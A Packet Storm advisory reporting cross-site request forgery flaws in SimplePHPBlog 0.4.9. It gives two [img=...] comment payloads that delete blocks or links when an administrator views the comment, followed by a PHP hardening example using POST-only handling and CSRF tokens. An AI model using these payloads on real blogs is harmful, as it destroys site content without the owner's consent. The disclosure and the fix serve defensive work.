sphpblog-csrf.txt

2007-10-22T00:00:00
ID PACKETSTORM:60250
Type packetstorm
Reporter Demential
Modified 2007-10-22T00:00:00

Description

`SimplePHPBlog  
Cross Site Request Forgeries  
Tested on v0.4.9  
  
Discovered by: Demential  
Web: http://hackish.altervista.org  
E-mail: deme [at] hackish [dot] eu  
SimplePHPBlog website: http://www.simplephpblog.com/  
  
  
- Posting [img=add_block.php?action=delete&block_id=*] in a comment,  
where * is the ID of a block:  
when an administrator reads the comment,  
block * is erased.  
  
- Posting [img=add_link.php?action=delete&link_id=*] in a comment,  
where * is the ID of a link:  
when an administrator reads the comment,  
link * is erased.  
`
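
Both requests above work because the delete actions run on a plain GET that carries the administrator's session cookie, which is exactly what a browser sends when it loads an image. A hardened handler pattern, as an added example that is not SimplePHPBlog's code (the function names, the `csrf_token` field and the sample values are assumptions):

```php
<?php
declare(strict_types=1);
// Added example, not SimplePHPBlog code. Function names and the
// 'csrf_token' field are assumptions made for illustration.

/** Return the per-session anti-CSRF token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/**
 * Gate for delete actions: POST only, with the session's token in the body.
 * An image load is a GET with no body, so an [img] tag fails both checks.
 */
function delete_request_allowed(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false; // never change state on GET
    }
    $expected = $session['csrf_token'] ?? null;
    $supplied = $post['csrf_token'] ?? null;
    return is_string($expected) && $expected !== ''
        && is_string($supplied)
        && hash_equals($expected, $supplied); // constant-time compare
}

/**
 * Defence in depth for comment rendering: accept an [img=...] URL only if
 * it is absolute http(s) and has no query string.
 */
function img_url_allowed(string $url): bool
{
    $parts = parse_url($url);
    return is_array($parts)
        && in_array($parts['scheme'] ?? '', ['http', 'https'], true)
        && !isset($parts['query']);
}

// Constructed demonstration values; run with `php example.php`.
$session = [];
$token = csrf_token($session);
var_dump(delete_request_allowed('GET', [], $session));
var_dump(delete_request_allowed('POST', ['csrf_token' => $token], $session));
var_dump(delete_request_allowed('POST', ['csrf_token' => 'guess'], $session));
var_dump(img_url_allowed('add_block.php?action=delete&block_id=1'));
```

In a real handler the arguments would be `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION` after `session_start()`; the image filter only reduces exposure inside comments, while the token check is what stops forged requests issued from other pages.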